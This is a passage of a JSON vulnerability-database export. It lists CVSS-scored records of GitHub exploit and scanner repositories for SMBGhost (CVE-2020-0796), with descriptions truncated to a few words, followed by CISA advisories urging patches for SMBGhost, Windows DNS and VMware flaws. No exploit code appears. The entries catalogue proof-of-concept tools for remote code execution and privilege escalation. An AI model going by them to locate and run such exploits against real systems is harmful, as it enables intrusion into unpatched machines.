"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-12-25T09:08:30", "id": "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-08T14:06:25", "description": "# CVE-2020-0796-SMB\n\u8be5\u8d44\u6e90\u4e3aCVE-2020-0796\u6f0f\u6d1e\u590d\u73b0\uff0c\u5305\u62ecPython\u7248\u672c\u548cC++\u7248\u672c\u3002\u4e3b\u8981\u662f\u96c6\u5408...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-02T12:12:03", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-06-08T03:05:02", "id": "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:22:52", "description": "# SMBGhost\nSimple scanner for CVE-2020-0796 - SMBv3 RCE.\n\nThe sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T15:21:27", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-27T07:11:36", "id": "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:58:14", "description": "# CVE-2020-0796-POC\n# \u53d7\u5f71\u54cd\u7cfb\u7edf\u7248\u672c\n\u6f0f\u6d1e\u4e0d\u5f71\u54cdwin7\uff0c\u6f0f\u6d1e\u5f71\u54cdWindows 10 1903\u4e4b\u540e\u7684\u5404\u4e2a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-06T03:56:52", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-11-06T05:27:47", "id": "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:10:15", "description": "# CVE-2020-0796\r\n\r\nWindows SMBv3 LPE Exploit\r\n\r\n![exploit](https...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-05-28T08:41:12", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-05-28T08:42:12", "id": "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:13", "description": "# SMBGhost\nAdvanced scanner for CVE-2020-0796 - SMBv3 RCE using ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-14T02:07:16", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-12-05T20:40:38", "id": "484522F4-99E8-5FCE-9CB6-2DB46070E529", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:48:16", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-09T04:52:55", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-11-26T15:51:17", "id": "935331CB-5C0B-5059-BAC4-383651C26C94", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:50:09", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T06:38:05", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-02-14T02:17:42", "id": "9B986515-0778-5365-8693-2669FC74128A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:36", "description": "# This is an educational exercise. Use at your own risk.\n\n# CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-14T14:42:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350", "CVE-2020-16898"], "modified": "2021-05-17T07:52:28", "id": "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-29T11:37:50", "description": "# SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-06T14:45:07", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1206", "CVE-2020-0796"], "modified": "2021-12-29T11:15:53", "id": "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-04T15:04:24", "description": "# CVE-2020-0796 Remote Code Execution POC\n\n(c) 2020 ZecOps, Inc....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-20T14:35:48", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2022-04-04T13:58:48", "id": "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T02:29:29", "description": "# Ladon Scanner For Python\n\n[![Author](https://img.shields.io/ba...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-11-19T16:51:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2894", "CVE-2020-0796"], "modified": "2022-03-31T01:03:48", "id": "387719E9-0938-5546-95DA-D88EC7E3FF13", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:49:58", "description": "# GUI Check CVE-2020-0796\n\n#### \u52d8\u8bef\uff1a\n\u6b63\u786e\u7684CVE\u540d\u79f0\u662fCVE-2020-0796\uff0c\u800c\u4e0d\u662fCV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-14T07:59:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-0976"], "modified": "2021-12-05T20:44:03", "id": "C8967016-587F-5098-AD59-ED5BF752FD5A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cisa": [{"lastseen": "2021-03-08T18:39:05", "description": "VMware has released security updates to address multiple vulnerabilities\u2014CVE-2021-21972, CVE-2021-21973, CVE-2021-21974\u2014in ESXi, vCenter Server, and Cloud Foundation. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.\n\nCISA encourages users and administrators to review VMware Security Advisory [VMSA-2021-0002](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/24/vmware-releases-multiple-security-updates>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "cisa", "title": "VMware Releases Multiple Security Updates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T00:00:00", "id": "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/24/vmware-releases-multiple-security-updates", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:37:27", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released Emergency Directive 20-03 addressing a critical vulnerability\u2014CVE-2020-1350\u2014affecting all versions of Windows Server with the Domain Name System (DNS) role enabled. A remote attacker could exploit this vulnerability to take control of an affected system. This vulnerability is considered \u201cwormable\u201d because malware exploiting it on a system could, without user interaction, propagate to other vulnerable systems.\n\nAlthough Emergency Directive 20-03 applies only to certain Executive Branch departments and agencies, CISA strongly recommends state and local governments, the private sector, and others patch this critical vulnerability as soon as possible. Review the following resources for more information:\n\n * [CISA Emergency Directive 20-03: Mitigate Windows DNS Server Remote Code Execution Vulnerability from July 2020 Patch Tuesday](<https://www.cisa.gov/emergency-directive-20-03>)\n * [CISA Blog on Emergency Directive (ED 20-03) Windows DNS Server Vulnerability](<https://www.cisa.gov/blog/2020/07/16/emergency-directive-ed-20-03-windows-dns-server-vulnerability>)\n * [Microsoft Security Vulnerability Information for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>)\n * [Microsoft Security Blog Post: CVE-2020-1350 Vulnerability in Windows DNS Server](<https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/cisa-releases-emergency-directive-critical-microsoft-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-16T00:00:00", "type": "cisa", "title": "CISA Releases Emergency Directive on Critical Microsoft Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-01-25T00:00:00", "id": "CISA:72803FA1C7CD81E274A0417B0A34353E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/cisa-releases-emergency-directive-critical-microsoft-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:43", "description": "Microsoft has released a security update to address a remote code execution (RCE) vulnerability\u2014CVE-2020-1350\u2014in Windows DNS Server. A remote attacker could exploit this vulnerability to take control of an affected system. This is considered a \u201cwormable\u201d vulnerability that affects all Windows Server versions.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft\u2019s [Security Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) and [Blog](<https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/ >) for more information, and apply the necessary update and workaround.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/07/14/microsoft-addresses-wormable-rce-vulnerability-windows-dns-server>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-14T00:00:00", "type": "cisa", "title": "Microsoft Addresses 'Wormable' RCE Vulnerability in Windows DNS Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-14T00:00:00", "id": "CISA:0A6DEB06CFB7BDA5A3D72E0F236C5665", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/07/14/microsoft-addresses-wormable-rce-vulnerability-windows-dns-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:42", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of publicly available and functional proof-of-concept (PoC) code that exploits CVE-2020-0796 in unpatched systems. Although Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber actors are targeting unpatched systems with the new PoC, according to recent open-source reports. CISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible. \n\nCISA also encourages users and administrators to review the following resources and apply the necessary updates or workarounds.\n\n * Microsoft Security Guidance for [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>)\n * Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>)\n * CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-05T00:00:00", "type": "cisa", "title": "Unpatched Microsoft Systems Vulnerable to CVE-2020-0796 ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 